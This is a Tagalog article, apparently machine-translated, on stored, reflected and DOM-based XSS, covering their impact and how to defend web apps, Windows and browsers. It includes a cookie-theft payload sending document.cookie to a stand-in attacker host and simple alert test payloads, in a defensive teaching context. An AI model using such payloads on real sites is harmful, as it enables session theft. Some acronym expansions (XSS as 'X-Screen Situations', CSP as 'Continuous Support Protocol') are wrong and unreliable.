Mga persistent na kahinaan sa XSS: ano ang mga ito at kung paano protektahan ang Windows at ang iyong mga browser

  • Pinapayagan ng XSS ang malisyosong JavaScript na maisagawa sa browser dahil sa kakulangan ng pagpapatunay at wastong paglabas ng datos ng user, na may direktang epekto sa privacy at integridad ng mga web application.
  • May tatlong pangunahing uri ng XSS (nakaimbak, naka-reflect, at nakabatay sa DOM), kung saan ang naka-imbak na XSS ang pinakamapanganib dahil malawakan nitong naaapektuhan ang lahat ng user na bumibisita sa nahawaang nilalaman.
  • Ang pagpapagaan ay nangangailangan ng pag-validate at pag-sanitize ng mga input, wastong pag-encode ng output, paglalapat ng CSP, pag-configure ng cookies gamit ang HttpOnly at Secure, at pag-asa sa mga secure na framework at library upang pamahalaan ang DOM.
  • Ang pagpapalakas ng Windows at mga browser, pagpapanatiling updated ang lahat, at pagsasagawa ng mga regular na pag-scan at penetration test ay susi sa pagbabawas ng tunay na panganib ng pagsasamantala at pagpigil sa epekto ng mga potensyal na kahinaan.
Pablo

17 Minutos

Mga persistent na kahinaan sa XSS: ano ang mga ito at kung paano protektahan ang Windows at ang iyong mga browser

Ang mga kahinaan ng cross-site scripting (XSS) ay matagal nang bumabagabag sa web, ngunit patuloy pa rin itong lumalabas sa mga bagong application na parang walang mali. Sa isang kapaligiran kung saan halos lahat ng bagay ay nangyayari sa pamamagitan ng browser at kung saan ginagamit natin ang Windows para sa trabaho, pamimili, pagbabangko, at pamamahala ng negosyo, ang pag-unawa... Ano nga ba ang persistent cross-site scripting, paano ito gumagana, at paano mo mapoprotektahan ang Windows at ang iyong mga browser? Hindi na ito nagiging isang bagay na "para sa mga mahilig sa seguridad" at nagiging isang pangunahing pangangailangan.

Kapag matagumpay na na-exploit ang isang Cross-Site vulnerabilities (XSS), higit pa sa pagpapakita ng mga pop-up na may mga mensahe ang magagawa ng attacker: maaari silang magnakaw ng mga session, magpanggap na iba, mag-exfiltrate ng data, o gamitin ang iyong browser bilang springboard upang ma-access ang iba pang mga internal system. Bukod pa rito, kung ang vulnerability ay nagpapatuloy, ang malisyosong code ay mananatiling naka-embed sa application at paulit-ulit na isinasagawa sa bawat pagbisita. Kaya naman mahalaga ang pagsasama-sama [ng mga kinakailangang hakbang sa seguridad]. mabubuting kasanayan para sa ligtas na pag-develop, tamang configuration ng cookie at browser, proteksyon ng Windows, at mga tool sa pagtukoy ng kahinaan kung gusto mong matulog nang mapayapa.

Ano ang XSS at bakit ito ay isang seryosong problema pa rin?

Ang Cross-Site Scripting (XSS) ay isang kahinaan sa seguridad ng web na nangyayari kapag pinapayagan ng isang application ang mga script na tumakbo. hindi mapagkakatiwalaang JavaScript code sa browser ng biktimaAng code na ito ay karaniwang nagmumula sa mga input ng user (mga form, parameter ng URL, komento, internal search engine, atbp.) na hindi pa maayos na na-validate o "nalinis" at pagkatapos ay ipinapakita sa pahina.

Hindi matukoy ng browser kung aling script ang lehitimong bahagi ng website at kung aling script ang inilagay ng isang attacker: Lahat ng nagmumula sa domain na iyon ay isinasagawa nang may parehong mga pribilehiyo.Ito ang dahilan kung bakit ang isang lehitimong site ay ginagawang perpektong patibong para sa pagnanakaw ng data o pagmamanipula ng mga aksyon ng user nang hindi nila namamalayan.

Sinasamantala ng mga umaatake ang XSS upang magsagawa ng lahat ng uri ng malisyosong gawain: pagnanakaw ng session cookie, pag-hijack ng account, pag-log ng keystroke, pag-redirect sa mga malisyosong website, sopistikadong phishing, o tahimik na pagbabago ng ipinapakitang nilalamanMagagawa ang lahat ng ito nang hindi direktang nakompromiso ang operating system; sapat na ang pag-atake lamang sa browser.

Ang nakababahala ay, kahit na ito ay isang kilalang depekto simula pa noong umpisa ng website, Patuloy na nasasakop ng XSS ang mga prominenteng posisyon sa OWASP Top 10 at sa mga ulat ng kahinaanAng mga pag-aaral tulad ng ginawa ng Acunetix ay nagpapahiwatig na humigit-kumulang 40% ng mga kahinaan na matatagpuan sa mga web application ay may kaugnayan sa XSS (X-Screen Situations). Iba-iba ang mga dahilan ng pananatili nito: pagtaas ng pagiging kumplikado ng mga web application, legacy code, kakulangan ng matatag na pagpapatunay, mga pagkakamali sa pagpapatupad ng mga hakbang tulad ng CSP (Continuous Support Protocol), limitadong kaalaman sa secure development, at ang patuloy na ebolusyon ng mga pamamaraan ng pag-atake.

Mga uri ng pag-atake ng XSS: naka-imbak, naka-reflect, at nakabatay sa DOM

Hindi lahat ng kahinaan sa XSS ay pareho ang kilos. Mahalagang makilala ang pagkakaiba sa pagitan ng tatlong pangunahing uri dahil Ang epekto at paraan ng pagprotekta sa sarili ay nagbabago sa bawat kaso., bagama't pareho ang kanilang pinagbabatayang sanhi: pagpapatakbo ng JavaScript sa browser ng biktima.

Nakaimbak o persistent na XSS: ang pinaka-mapanganib

Nangyayari ang isang nakaimbak na XSS kapag ang malisyosong code ay permanenteng nakaimbak sa server: kadalasan sa isang database, ngunit pati na rin sa mga file, mga sistema ng pag-log o iba pang mga lokasyon ng imbakanSa bawat oras na ilo-load ng isang user ang pahinang nagpapakita ng impormasyong iyon, ang script ay inihahain at isinasagawa sa browser.

Mag-isip ng isang forum o sistema ng komento ng isang blog. Kung sine-save ng application ang komento nang walang pagbabago at pagkatapos ay ipinapakita ito nang hindi ito tinatakasan o dinidisimpekta, maaaring maglagay ang isang attacker ng isang bagay tulad ng <script>...código-malicioso...</script> sa teksto ng komentoAng fragment na iyon ay nakaimbak sa database, at sa bawat pagbisita sa thread na iyon ay magiging sanhi ng awtomatikong pagtakbo ng script sa lahat ng browser na nagpapakita nito.

Ang ganitong uri ng XSS ay lalong mahalaga dahil sinusukat ang epekto ng isang payload sa lahat ng user na bumibisita sa apektadong contentMay mga pagkakataon na ang isang nahawaang tweet o komento ay awtomatikong nagre-retweet o nagbabahagi ng sarili nito (tulad ng nangyari sa TweetDeck), na nagpaparami nang husto sa saklaw ng pag-atake. Sa mga korporasyon, kung ang apektadong user ay isang administrator, maaaring makakuha ng access ang attacker sa mga internal management dashboard o kumalat pa nga sa iba pang mga sistema.

Sinasalamin o hindi paulit-ulit na XSS

Nangyayari ang reflected XSS kapag kumukuha ang application ng data mula sa HTTP request (halimbawa, isang parameter ng URL, isang field ng form, o isang header), direktang ipinapasok nito ito sa tugon at ang script ay tumatakbo sa browser ng biktima sa parehong interaksyon na iyon, nang hindi iniimbak sa server.

Isang tipikal na halimbawa: isang pahina ng paghahanap na nagpapakita ng hinanap na teksto na may mensaheng tulad ng “Mga Resulta para sa X”. Kung ang application ay hindi maayos na nakatakas sa halagang iyon at may nagpadala ng link na tulad ng:

https://sitio.com/buscar?q=<script>alert('XSS')</script>

Sa paglalagay ng URL na iyon, isasagawa ng browser ang malisyosong script na ipinasok sa parameterAng ganitong uri ng pag-atake ay kadalasang sinasamahan ng mga kampanyang phishing o social engineering: kailangang kumbinsihin ng umaatake ang biktima na i-click ang minanipulang link.

Sa mga tuntunin ng agarang epekto, ang nakalarawang XSS ay karaniwang nakakaapekto sa isang partikular na gumagamit sa bawat pagpapatupad, ngunit kung ang kampanya sa pamamahagi ng link ay malawakan (email, social media, instant messaging), ang pinsala ay maaaring katulad ng sa isang nakaimbak na item.

XSS na nakabatay sa DOM

Nangyayari ang DOM-based XSS kapag ang kahinaan ay ganap na nasa client-side JavaScript code. Dito, maaaring naghahatid ang server ng "malinis" na HTML, ngunit Ang JavaScript na tumatakbo sa browser mismo ay nagbabasa ng data mula sa mga hindi mapagkakatiwalaang mapagkukunan (tulad ng location.search, location.hash o document.referrerat ini-inject ang mga ito sa DOM nang walang pagpapatunay.

Halimbawa, isang script na kumukuha ng parameter mula sa URL at inilalagay ito gamit ang innerHTML para i-personalize ang isang mensahe ng pagbati. Kung may magpasa ng URL na naglalaman ng malisyosong HTML o JavaScript, bibigyang-kahulugan ng browser ang nilalamang iyon bilang code at isasagawa ito. Ang lahat ng ito nang hindi nakakarating ang payload sa serverna nagpapakomplikado sa pagtukoy nito sa mga log o tradisyonal na filter.

Sa pagsasagawa, ang DOM XSS, kasama ng nakalarawang XSS, ay may pangangailangan para sa isang manipulable link o input at isang social engineering component, ngunit Direktang sinasamantala nito ang front-end logic at hindi secure na DOM access.Bukod pa rito, maraming server filter at WAF ang nakakasagabal dito dahil tila "normal" na trapiko lang ang nakikita ng mga ito.

Ano ang maaaring makamit ng isang attacker gamit ang XSS?

Ang tindi ng isang Cross-Site Exploit (XSS) ay kadalasang minamaliit, ngunit sa kamay ng isang taong may masamang hangarin, maaari itong maging mapaminsala. Ang mga epekto ay maaaring maging mapaminsala para sa parehong mga gumagamit at mga kumpanya, mula sa teknikal hanggang sa reputasyon at ekonomiya.

Pagnanakaw ng cookies, sessions at credentials

Isa sa mga klasikong gamit ng XSS ay ang pagnanakaw ng mga session cookies at iba pang authentication token. Kung ang cookie ay walang flag HttpOnlymababasa ito ng iskrip gamit ang document.cookie at ipadala ito sa isang server na kontrolado ng attacker:

<script>document.location='http://atacante.com/cookie?'+document.cookie</script>

Sa sandaling i-load ng biktima ang nahawaang pahina, gagawa ang kanilang browser ng kahilingan sa malisyosong URL. kasama ang ninakaw na session cookie bilang isang parameterGamit ang cookie na iyon, maaaring magpanggap ang attacker bilang user sa application, tingnan ang pribadong impormasyon, magsagawa ng mga operasyon para sa kanila, at kahit na, kung ang user ay isang administrator, ma-access ang mga kritikal na panel.

Bukod pa rito, maaaring itala ng isang injected script ang lahat ng itina-type ng user sa mga form (input ng keyboard, mga login field, mga detalye ng card, atbp.) at ipadala ito sa attacker. Ito pagkuha ng mga kredensyal at sensitibong datos Madalas itong isinasama sa mas malawak na mga pakana ng pandaraya.

Mga pag-redirect, phishing, at manipulasyon ng nilalaman

Isa pang karaniwang senaryo ay ang tahimik na pag-redirect sa mga malisyosong o phishing site. Maaaring gamitin ng script ang window.location para ipadala ang user sa isang website na ginagaya ang orihinal, kung saan hihilingin sa kanila na mag-log in muli o maglagay ng kumpidensyal na data. Pinagkakatiwalaan ito ng user dahil Nagmula ito sa isang lehitimong pinagmulang domain na kakabisita mo lang.

Posible ring baguhin ang DOM upang magpakita ng mga pekeng login form, banner, o magkakapatong na pop-up, o kahit baguhin ang nilalaman na nakikita ng biktima upang linlangin sila (halimbawa, pagpapalit ng numero ng bank account sa isang intranet, pamemeke ng mga mensahe ng system, o pagmamanipula ng mga nakikitang aksyon).

Pamamahagi ng malware at paglala ng pag-atake

Maaaring pilitin ng XSS ang browser na mag-download o magpatakbo ng mga malisyosong mapagkukunan, tulad ng mga panlabas na script na naka-host sa mga domain na nasa ilalim ng kontrol ng attackerKasama ng iba pang mga kahinaan sa browser, mga plugin, o maging sa mismong sistema, posibleng isagawa ang katutubong code at ikompromiso ang Windows computer ng biktima.

Sa mga kapaligirang pangkorporasyon, ang isang pag-atake ng XSS laban sa isang panloob na aplikasyon ay maaaring magsilbing isang punto ng pagpasok para sa paggalaw sa gilid: Mula sa nakompromisong browser, ang mga na-authenticate na kahilingan ay ipinapadala sa iba pang mga serbisyo, kinokolekta ang mga karagdagang token, o sinasamantala ang mga maling pag-configure sa mga internal na network.Sa madaling salita, ang isang simpleng "test alert" ay maaaring maging daan patungo sa isang malubhang insidente.

Bukod pa rito, mula sa pananaw ng negosyo, ang isang site na apektado ng XSS ay maaaring magdusa pagkawala ng tiwala ng gumagamit, pagbaba ng mga conversion at benta, at maging ang mga parusa sa SEO kung may matukoy ang Google na kakaibang pag-uugali o kung ang website ay mapasama sa mga blacklist ng mga browser at antivirus software.

Epekto sa Windows at mga browser: kung saan nilalaro ang tunay na laro

Bagama't ang XSS ay isang kahinaan sa web application, ang sitwasyon kung saan nangyayari ang pinsala ay ang browser na tumatakbo sa iyong Windows system. Nangangahulugan ito na ang kombinasyon ng mga setting ng browser + Windows + mga solusyon sa seguridad Ito ang gumagawa ng pagkakaiba sa pagitan ng isang takot at isang sakuna.

Isinasama ng mga modernong browser (Chrome, Edge, Firefox, atbp.) ang mga mekanismo ng paghihiwalay ng proseso (sandboxing), mga filter ng XSS, mga pop-up blocker, mga listahan ng mga mapanganib na site, at proteksyon sa pag-downloadAng Windows, sa bahagi nito, ay nag-aalok ng mga tampok tulad ng SmartScreen, pagkontrol ng aplikasyon, pinagsamang antivirus, at mga patakaran sa paghihigpit sa mga kapaligirang pangkorporasyon.

Gayunpaman, kung ang gumagamit ay magba-browse gamit ang mga profile ng administrator, mga kahina-hinalang extension, o mga lumang browserO, kung hindi paganahin ang mga hakbang sa seguridad upang "mapagana ang lahat," ang espasyo ng isang umaatake para maniobrahin ay lubhang tataas. Ang isang kahinaan ng XSS na mahusay na na-exploit ay maaaring gamitin upang mag-download ng malware, pagsamantalahan ang mga kahinaan ng browser o plugin, o gamitin ang device bilang pivot point upang atakehin ang iba pang mga asset.

Samakatuwid, kahit na ang teknikal na ugat ng pagkabigo ay nasa web application, ito ay mahalaga patigasin ang Windows at mga browser: bawasan ang saklaw ng pag-atake sa pamamagitan ng pagliit ng mga pahintulot, paglalapat ng mga update, pagkontrol sa mga extension, paggamit ng mga whitelist ng pagpapatupad at pagsasama-sama nito sa mabubuting kasanayan sa pag-browse.

Paano matukoy ang mga kahinaan ng XSS sa iyong mga aplikasyon

Kung namamahala ka ng isang website o isang application sa negosyo, hindi sapat ang pagtitimpi. Kailangan mo ng isang proactive na diskarte sa hanapin at suriin ang mga mahihinang entry point bago gawin ito ng mga umaatakeDito pumapasok ang iba't ibang pamamaraan at kagamitan.

Awtomatikong pag-scan at pag-fuzz

Kagamitan tulad ng OWASP ZAP, Burp Suite, Acunetix, Netsparker at iba pang mga scanner ng kahinaan Pinapayagan ka nitong maglunsad ng mga kontroladong pag-atake laban sa iyong aplikasyon, mga testing form, mga parameter ng URL, mga header, at mga ruta upang matukoy ang kahina-hinalang pag-uugali ng XSS.

Karaniwang pinagsasama ng mga scanner na ito ang pagsubok ng mga partikular na payload sa mga pamamaraan ng nag-aalabAng mga pagsubok na ito ay mahalagang kinabibilangan ng pagpapadala ng random, hindi inaasahan, o maling porma ng data sa mga input field upang makita kung paano tumutugon ang application. Ang isang resulta na nagbabalik ng input nang hindi tumatakas o nagsasagawa ng test script ay nagpapakita ng depekto.

Manu-manong pagsubok gamit ang mga script ng pagsubok

Bilang karagdagan sa awtomatikong pag-scan, inirerekomenda na magsagawa ng mga manu-manong pagsusuri: magpasok ng mga simpleng script tulad ng <script>alert('XSS')</script> sa mga form, mga parameter ng URL, mga field ng paghahanap, mga komento, o anumang input na makikita sa pahinaMalinaw na dapat itong gawin sa mga kapaligirang pang-develop o pre-production, hindi kailanman sa mga sistema ng produksyon.

Mga extension ng browser tulad ng XSS Me, Web Developer o NoScript Nakakatulong ang mga ito sa pag-audit ng gawi ng kliyente, pag-highlight ng mga error sa JavaScript, pagtingin sa kung ano talaga ang gumagana sa DOM, at pagsubok sa iba't ibang vector. Maipapayo rin na lubusang suriin ang code, lalo na kung saan ginagamit ang mga ito. innerHTML, document.write, eval o pagsasama-sama ng HTML sa datos ng gumagamit.

Pagsusuri ng kodigo at paggamit ng SAST

Ang pagsasama ng mga tool ng Static Application Security Testing (SAST) sa development cycle ay isa sa mga pinakamabisang paraan upang mapigilan ang cross-site scripting (XSS) nang maaga. Sinusuri ng mga static analyses na ito ang source code na naghahanap ng Mga hindi ligtas na pattern: hindi napatunayang data na dumarating sa mga view, maling escape, direktang manipulasyon ng DOM gamit ang mga hindi mapagkakatiwalaang input, Atbp

Sa pamamagitan ng pagsasama ng SAST sa mga pagsusuri ng manual code na nakatuon sa seguridad, matutukoy mo ang mga lugar kung saan nawawala ang exit escape, kung saan hindi pinagana ang isang framework filter, o kung saan ginamit ang mga mapanganib na bypass, tulad ng Html.Raw sa Pang-ahit, v-html sa Vue, [innerHTML] sa Angular, o dangerouslySetInnerHTML sa React.

Paano protektahan ang iyong mga aplikasyon laban sa XSS

Ang susi sa pagpapagaan ng XSS ay wala sa isang iisang paraan, kundi sa Maglapat ng maraming patong ng depensa: pagpapatunay ng input, wastong pag-encode ng output, mahigpit na mga setting ng cookie, CSP, ligtas at napapanahong mga framework. Pumunta tayo sa mga bahagi.

Patunayan at i-sanitize ang lahat ng input ng user

Golden Rule: Huwag kailanman magtiwala sa anumang datos na nagmumula sa gumagamit o mga panlabas na mapagkukunan.Kabilang dito ang mga form, mga parameter ng URL, mga header ng HTTP, data na na-import mula sa iba pang mga application, mga nakatagong field, atbp. Ang pagpapatunay ay dapat palaging gawin sa server, bagama't maaari rin itong ilapat sa panig ng kliyente para sa mga kadahilanang madaling gamitin.

Depende sa konteksto, maaari mong:

  • Limitahan ang hanay ng mga karakter gamit ang mga regular na expression (halimbawa, mga letra, numero, at espasyo lamang).
  • Limitahan ang maximum na haba ng mga field upang maiwasan ang malalaking payload.
  • Direktang tanggihan ang mga HTML tag kung hindi naman kailangan.
  • Kung kailangan mong payagan ang ilang partikular na HTML (halimbawa, sa mga rich comment), gumamit ng mga library ng sanitization tulad ng DOMPurify (JS), HtmlSanitizer (.NET), AntiXSS, atbp., na nag-aalis ng mga mapanganib na script at attribute.

Sa .NET, halimbawa, ang framework ay may kasamang mga default na proteksyon na humaharang sa mapanganib na input, ngunit kung gagamit ka ng mga katangian tulad ng [ValidateInput(false)] Kung papayagan mo ang hindi na-sanitize na HTML, bubuksan mo ang pinto sa XSS.Mahalagang maging lubos na mapagmatyag kung kailan hindi pinagana ang mga proteksyong ito at bawiin ito gamit ang mga partikular na filter.

Maayos na pagtakas sa output (output encoding)

Ang ikalawang bahagi ng problema ay kung paano ipinapakita ang datos. Kahit na i-validate mo ito, kung direktang ilalagay mo ang halaga sa HTML nang hindi ito tinatakasan, maaari ka pa ring maging mahina. Ang tamang paraan ay i-encode ang mga espesyal na karakter ayon sa konteksto kung saan gagamitin ang mga ito:

  • Sa HTML, pagtakas <, >, &, isahan at dobleng panipi (sa PHP, halimbawa, gamit ang htmlspecialchars() o htmlentities()).
  • Sa mga HTML attribute, gamitin din ang mga escape quotation mark at control character.
  • Sa inline na JavaScript, gumamit ng mga partikular na encoder (halimbawa, ang JavaScriptEncoder sa .NET).
  • Sa mga URL, gumamit ng mga parameter encoding function (UrlEncoder, encodeURIComponent, Atbp).

Maraming modernong balangkas ang halos "tapos na": Awtomatikong nagko-encode ang Razor sa .NET ng mga variable maliban na lang kung gagamit ka ng Html.RawBilang default, tinatakasan ng React ang nilalaman, at ligtas na pinangangasiwaan ng Angular at Vue ang mga interpolasyon hangga't walang ginagamit na API na nag-iinject ng raw HTML. Mahalagang samantalahin ang mga proteksyong ito.

Ilapat ang Patakaran sa Seguridad ng Nilalaman (CSP)

Ang isang maayos na na-configure na Patakaran sa Seguridad ng Nilalaman ay isang napakalakas na karagdagang layer laban sa XSS. Gamit ang CSP, maaari mong tukuyin, gamit ang mga HTTP header, kung saan pinapayagang i-load ang mga script, estilo, iframe, imahe, atbp. at kung pinapayagan ba o hindi ang mga inline script.

Ang isang simpleng halimbawa ay:

Content-Security-Policy: default-src 'self'; script-src 'self' https://scripts-confiables.com

Ipinapahiwatig nito na tanging ang mga script na inihahatid mula sa iyong sariling domain o mga pinagkakatiwalaang domain ang maaaring isagawa. Kahit na mayroong kahinaan sa XSS, Ang isang script na ini-inject na nagtatangkang mag-load ng code mula sa isang third party ay haharangan.Hindi pinapalitan ng CSP ang validation at escaping, ngunit lubos nitong binabawasan ang epekto ng mga error na maaaring nakaligtaan.

I-configure nang tama ang mga cookies

Ang mga session cookies ay isang paboritong target para sa mga pag-atake ng XSS. Upang mabawasan ang pinsala, mahalagang i-configure ang mga ito gamit ang mga naaangkop na flag:

  • HttpOnly: pinipigilan ang JavaScript na ma-access ang cookie sa pamamagitan ng document.cookieIto ang pinakadirektang paraan upang mapigilan ang pagnanakaw ng sesyon ng klasikong XSS.
  • Hindi makatatakas: pinipilit ang cookie na ipadala lamang sa pamamagitan ng mga koneksyon ng HTTPS, na pumipigil sa mga tagas sa mga hindi naka-encrypt na channel.
  • Parehong Site: nililimitahan ang pagpapadala ng cookie sa mga cross-site na kahilingan, na binabawasan ang mga panganib ng CSRF at ilang pinagsamang senaryo ng XSS.

Sa PHP, halimbawa, maaari mo itong itakda gamit ang session_set_cookie_paramsat sa iba pang mga kapaligiran na may katumbas na mga API. Bagama't hindi nito pinipigilan ang script na tumakbo, ginagawa nito makabuluhang binabawasan ang potensyal na epekto sa pagpapatotoo.

Gumamit ng mga framework at library na ligtas sa DOM

Sa panig ng kliyente, ang pinakamahusay na kasanayan ay iwasan ang manu-manong manipulasyon ng DOM hangga't maaari. Ang mga balangkas tulad ng React, Angular o Vue Ina-update nila ang DOM sa pamamagitan ng awtomatikong pagtakas ng data at hinihikayat ang mga pattern na nagbabawas sa pangangailangang gamitin innerHTML, document.write o evalna malinaw na mapanganib.

Kung kailangan mong manipulahin ang dynamic na HTML, umasa sa pag-sanitize ng mga library tulad ng DOMPurifyna sumusuri sa nilalaman at nag-aalis ng mga potensyal na nakakahamak na tag, katangian, at iskema. At higit sa lahat, Maingat na suriin ang anumang paggamit ng mga API na nagpapahintulot sa pag-inject ng raw HTML.dahil sila ang kadalasang mahinang kawing na nagbubukas ng pinto patungo sa DOM-based XSS.

Panatilihing napapanahon ang lahat: CMS, mga plugin, at mga library

Maraming totoong panghihimasok ang hindi sanhi ng code na iyong isinusulat, kundi ng mga ikatlong partido: Mga plugin ng WordPress, mga module ng Joomla, mga library ng JS, mga template, mga lumang bahagi ng front-end o back-end na may mga kilalang kahinaan, kabilang ang XSS.

Dapat maging malinaw ang rutina: Regular na suriin at ilapat ang mga security patch, alisin ang mga hindi nagamit na plugin at tema, iwasan ang mga basag o hindi opisyal na bersyon, at subaybayan ang mga alerto sa seguridad mula sa iyong CMS o framework.Ang WAF (Web Application Firewall) tulad ng iniaalok ng ilang hosting provider (halimbawa, kasama ang Imunify360, Cloudflare WAF, atbp.) ay nagdaragdag ng karagdagang layer, na sinasala ang mga kilalang pagtatangka ng pag-iniksyon sa antas ng HTTP.

Paano palakasin ang Windows at ang iyong mga browser laban sa mga pag-atake ng XSS

Kahit na ang ugat ng problema ay nasa server, maaari mong lubos na mabawasan ang panganib ng paglala ng isang XSS attack sa pamamagitan ng pagpapatibay ng iyong user environment. Kasama rito ang parehong mga mabubuting kasanayan sa paggamit tulad ng mga setting ng seguridad sa Windows at mga browser.

Mahusay na kasanayan sa nabigasyon

Ang unang punto ay sentido komun, ngunit patuloy itong binabalewala araw-araw: Huwag mag-click sa mga kahina-hinalang link o magbukas ng mga kakaibang URL na dumarating sa pamamagitan ng email, social media, o pagmemensahelalo na kung ang mga ito ay nagmula sa mga hindi kilalang nagpadala o naglalaman ng mga nakababahalang mensahe o mga mensaheng tila napakaganda para maging totoo.

Sa partikular na kaso ng nakalarawang XSS, ang pag-atake ay karaniwang kinasasangkutan ng isang link na may mahaba at hindi pangkaraniwang mga parameter. Kahit na ginagamit ang mga URL shortener upang itago ito, mag-ingat sa mga komento sa mga forum, mga pribadong mensahe, o mga email na may kasamang mga link na walang malinaw na konteksto binabawasan ang posibilidad ng pagpapaputok ng kargamento.

Ligtas na i-configure ang mga browser

Ang Chrome, Edge, Firefox at ang kanilang mga hinango ay may mga opsyon na dapat suriin:

  • Panatilihing laging updated ang iyong browser, na nagpapahintulot sa mga awtomatikong pag-update.
  • Suriin ang naka-install na mga extension at i-uninstall ang anumang app na hindi mo ginagamit o hindi pinagkakatiwalaan.
  • I-activate ang mga function ligtas na pagba-browse (Google Safe Browsing, Microsoft Defender SmartScreen) na humaharang sa mga pahinang iniulat bilang malisyoso.
  • Limitahan o huwag paganahin ang pagpapatupad ng hindi kinakailangang aktibong nilalaman (halimbawa, mga legacy plugin) at pamahalaan ang mga pahintulot ng site (camera, mikropono, mga notification) nang matalino.

Sa mga kapaligirang pangkorporasyon, karaniwan na isentralisa ang mga konpigurasyong ito sa pamamagitan ng mga patakaran ng grupo (GPO) o mga patakaran ng browserpinipigilan ang gumagamit na ibaba ang antas ng seguridad para sa kaginhawahan.

Pagpapahusay ng Windows: Antivirus, Firewall, at Kontrol ng Aplikasyon

Mayroon nang mahusay na pangunahing pakete ng seguridad ang Windows 10 at 11: Microsoft Defender Antivirus, built-in na firewall, proteksyon batay sa reputasyon, kontrol ng aplikasyon, SmartScreen, atbp.Gayunpaman, maraming kumpanya at gumagamit ang pumipili ng mga karagdagang solusyon (halimbawa, ang Avast) na nag-aalok ng mga karagdagang patong ng proteksyon laban sa mga malisyosong script, kahina-hinalang trapiko, o mga nakompromisong pag-download.

Upang mabawasan ang panganib mula sa isang Cross-Site Script (XSS) na pag-atake na nagtatangkang mag-install ng malware o magpatakbo ng code na lampas sa browser, mahalagang:

  • Pag-browse gamit ang mga karaniwang user accounthindi sa mga account na may mga pribilehiyong administrator.
  • Isaaktibo ang Kontrol ng Account ng Gumagamit (UAC) at huwag itong patayin "para wala nang makaabala."
  • I-configure ang mga patakaran nagpapatakbo ng mga application (AppLocker o Windows Defender Application Control) sa mga enterprise environment upang limitahan kung aling mga binary ang maaaring patakbuhin.
  • Palakasin ang firewall at, kung maaari, subaybayan ang papalabas na trapiko para sa mga koneksyon sa mga kahina-hinalang domain na maaaring magpahiwatig ng paglabas ng data (hal., pagpapadala ng mga ninakaw na cookies).

Pamamahala ng kahinaan at pagsubok sa pagtagos: pananatiling nangunguna sa umaatake

Ipinapakita ng karanasan na ang tanging makatotohanang paraan upang maiwasan ang XSS ay ang ituring ito bilang bahagi ng isang patuloy na pamamahala ng kahinaanhindi bilang isang minsanang bagay. Nangangahulugan ito ng pagsasama-sama ng:

  • I-clear ang imbentaryo ng mga web application at serbisyo na iyong pinangangasiwaan (panloob at panlabas).
  • Mga pana-panahong pag-scan gamit ang mga awtomatikong tool sa pagsusuri ng kahinaan.
  • Regular na Pagsubokpanloob o panlabas, na ginagaya ang mga totoong pag-atake, kabilang ang stored, reflected, at DOM-based na XSS.
  • Pagsasanay sa ligtas na pag-unlad upang lubos na maunawaan ng mga pangkat kung paano nagmumula ang problema at kung paano ito maiiwasan mula pa sa yugto ng disenyo.

Ang mga kompanyang dalubhasa sa ethical hacking at penetration testing ay makakatulong sa iyo na matukoy hindi lamang ang XSS, kundi pati na rin Iba pang mga kahinaan sa ibang bahagi (mga iniksyon ng SQL, mga pagkabigo sa pagpapatotoo, pagkakalantad ng sensitibong data, mga error sa configuration) na, kung pagsasamahin, ay nagbibigay-daan para sa pagsasama-sama ng mga kumplikadong pag-atake tulad ng kaso ng Jira sa Apache Foundation, kung saan ang isang nakalarawang XSS ay nagbukas ng pinto sa napakahalagang pag-access.

Sa huli, ang pag-unawa sa kung ano ang mga persistent XSS vulnerabilities, kung paano gumagana ang iba't ibang uri ng pag-atake, at kung anong mga hakbang ang ilalapat sa parehong web development at Windows at sa iyong mga browser ay naglalagay sa iyo sa isang mas malakas na posisyon. Mahigpit na pagpapatunay, wastong pagtakas, CSP, matatag na configuration ng cookie, mga modernong framework, patuloy na pag-update, mahusay na kasanayan sa pag-browse, pagpapatibay ng system, at mga regular na pag-auditMalaki ang nababawasan mo sa saklaw ng pag-atake at pinipigilan ang isang simpleng script na may ilang linya na maging sanhi ng isang malubhang insidente sa seguridad.